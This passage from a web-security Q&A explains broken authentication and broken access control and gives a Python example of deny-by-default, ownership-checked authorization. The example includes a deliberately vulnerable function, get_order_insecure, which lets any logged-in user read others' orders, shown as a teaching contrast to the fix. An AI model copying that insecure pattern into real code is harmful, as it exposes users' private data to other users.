Automated attacks such as credential stuffing (replaying username and password pairs leaked from other breaches), brute force guessing, and the use of default, weak or well-known passwords such as 'Password1' or 'adminadmin'.
How can Broken Authentication weaknesses be mitigated?
Implement multi-factor authentication, never ship with default credentials, check new passwords against lists of weak and breached passwords, lock or throttle accounts after a number of failed login attempts, store passwords with a salted, slow hash, and generate, rotate and expire session identifiers securely.
What is Broken Access Control?
Broken Access Control is a weakness in a web application that lets users act outside their authorized permissions: viewing or editing other users' data, or invoking functions reserved for higher-privileged roles.
What can happen due to Broken Access Control vulnerabilities?
Unauthorized disclosure, modification or destruction of data, and execution of business functions outside the user's limits. A typical case is an insecure direct object reference: User A changes an ID in a URL and sees User B's details because the server checked only that the caller was logged in, not that the caller owned the record.
How can Broken Access Control vulnerabilities be mitigated?
Deny access by default and enforce authorization on the server for every request, use access control lists and role-based access control so that users are limited to their designated permissions, check ownership of each object a request touches, and log access control failures with alerts for administrators so that repeated attempts are noticed.
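The mitigations above in code, as an added example written for this page rather than taken from the deck: a Python order service with deny-by-default role permissions, an ownership check that closes the User A / User B case, and a log of access control failures. The roles, permission names, order records and the `Forbidden` exception are constructed assumptions; `get_order_insecure` is kept deliberately broken to show the bug next to the fix.

```python
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed roles, permissions and records (assumptions for this example).
ROLE_PERMISSIONS: Dict[str, Set[str]] = {
    "user":    {"order:read-own", "order:cancel-own"},
    "support": {"order:read-any"},
    "admin":   {"order:read-any", "order:cancel-any"},
}


@dataclass
class Principal:
    username: str
    role: str


@dataclass
class Order:
    id: int
    owner: str
    total: float


ORDERS: Dict[int, Order] = {
    1: Order(1, "alice", 40.0),
    2: Order(2, "bob", 99.0),
}

# Every denied request is recorded so that repeated probing can raise an alert.
ACCESS_FAILURES: List[str] = []


class Forbidden(Exception):
    pass


def has_permission(p: Principal, perm: str) -> bool:
    # Unknown roles get an empty permission set: deny by default.
    return perm in ROLE_PERMISSIONS.get(p.role, set())


def authorize_order(p: Principal, action: str, order: Order) -> bool:
    """Allowed only if the role grants the action on any order, or grants the
    '-own' variant and the caller actually owns this order."""
    if has_permission(p, f"order:{action}-any"):
        return True
    return has_permission(p, f"order:{action}-own") and order.owner == p.username


def deny(p: Principal, action: str, order_id: int) -> None:
    msg = f"{p.username} ({p.role}) denied {action} on order {order_id}"
    ACCESS_FAILURES.append(msg)
    raise Forbidden(msg)


def get_order_insecure(p: Principal, order_id: int) -> Order:
    """The bug: being logged in is treated as authorization, so any user can
    read any order by changing the id (an insecure direct object reference)."""
    return ORDERS[order_id]


def get_order(p: Principal, order_id: int) -> Order:
    order = ORDERS.get(order_id)
    # Same response for 'no such order' and 'not yours', so the endpoint does
    # not confirm which ids exist.
    if order is None or not authorize_order(p, "read", order):
        deny(p, "read", order_id)
    return order


def cancel_order(p: Principal, order_id: int) -> str:
    order = ORDERS.get(order_id)
    if order is None or not authorize_order(p, "cancel", order):
        deny(p, "cancel", order_id)
    return f"order {order_id} cancelled by {p.username}"


if __name__ == "__main__":
    alice = Principal("alice", "user")
    print("insecure:", get_order_insecure(alice, 2))      # alice reads bob's order
    try:
        get_order(alice, 2)
    except Forbidden as e:
        print("secure:", e)
    print(ACCESS_FAILURES)
```

The check lives in the service layer, not in the page that renders a link, so a user who types an ID directly into the URL hits the same `authorize_order` call as one who clicks through the interface.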